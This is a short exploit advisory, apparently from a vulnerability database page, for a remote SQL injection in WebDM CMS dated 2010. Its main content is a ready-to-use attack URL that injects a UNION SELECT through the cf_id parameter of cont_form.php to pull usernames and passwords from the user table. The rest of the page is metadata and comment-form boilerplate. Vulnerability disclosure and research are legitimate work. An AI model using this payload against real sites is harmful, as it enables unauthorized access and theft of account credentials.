WebDM CMS remote SQL injection vulnerability

2010.11.02

Credit: Cru3l.b0y

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

In The Name Of GOD
[+] Exploit Title: WebDM CMS SQL Injection Vulnerability
[+] Date: 2010-10-31
[+] Author : Cru3l.b0y
[+] Software Link: http://www.internetdm.co.uk/site/pages.php?fid=0,1,12
[+] Tested on: Ubuntu 10.10
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
http://target/path/cont_form.php?fid=0,325&cf_id=-1+union+select+1,2,3,concat(User,0x3a,Password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user--

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WebDM CMS remote SQL injection vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.